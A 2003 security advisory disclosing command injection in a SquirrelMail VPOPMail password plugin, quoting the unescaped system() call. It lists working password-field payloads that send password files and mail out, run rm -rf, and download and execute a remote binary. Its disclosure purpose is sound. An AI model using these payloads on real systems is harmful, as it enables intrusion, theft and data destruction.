VPOPMail Account Administration (squirrel mail) version 0.9.7

2003-03-13T00:00:00
ID SECURITYVULNS:DOC:4200
Type securityvulns
Reporter Securityvulns
Modified 2003-03-13T00:00:00

Description

Plugin info: http://www.squirrelmail.org/plugin_view.php?id=103

Description:

VPOPMail Account Administration The plugin lets the user do the tasks he would be able using qmailadmin

change password let mails forward create away messages

Notes (from the README):

*** IMPORTANT **** For the plugin to work correctly, the Web-Server needs to run as same user as vpopmail does (most common: user vpopmail) this is because the plugin needs write-permissions to the users Maildir to - create appropriate .qmail-files - create away - messages

Comments (from myself):

This (allowing anything to be excuted as the web user) of course is a huge security hole. This actually goes beyond that and says to run the web server as vpopmail!

Amazing! These people are far too trusting of their users.

Bad idea.

What could be worse?

How about making it even easier to exploit every vpopmail binary?

How?

Unclean input parsing!

If the vpopmail user is the same as the webuser you get to have fun with:

vaddaliasdomain vconvert vdominfo vpasswd vadddomain vdeldomain vipmap vpopbull vadduser vdelivermail vkill vqmaillocal valias vdeloldusers vmkpasswd vsetuserquota vchkpw vdeluser vmoduser vuserinfo

Basically the exploits are unlimited (as you get full access rights to vpopmail):

change password

password;~vpopmail/bin/vpasswd user@host password

mail password database

password;cat ~vpopmail/domains/example.com/vpasswd|mail -s owned user@host

remove vpopmail

password;rm -rf ~vpopmail/

get listings of mail

password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail user@host

read any users mail

passwd;cat ~vpopmail/domains/example.com/user/Maildir/new//1027359339.48628.example.com\,S\=2432 | mail user@host

execute other arbatrary code on server

passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;

Here is the offending code (line 45 in vpopmail.php):

system("$vpasswd $username $pwd");

As we can see, this is very bad.

Very bad security model (running your webserver as vpopmail) backed up by sloppy coding (passing user entered data into the shell unescaped) == bad bad bad.

So you just pass anything I wrote above (or really anything at all that you desire) and you own the systems vpopmail config.

Enter this data into the password changing field (make sure it matches up in both) in the squirrel mail vpopmail password section to exploit.

But it's just a plugin to a webmail system, so no big deal ;-)

-- error <error@lostinthenoise.net>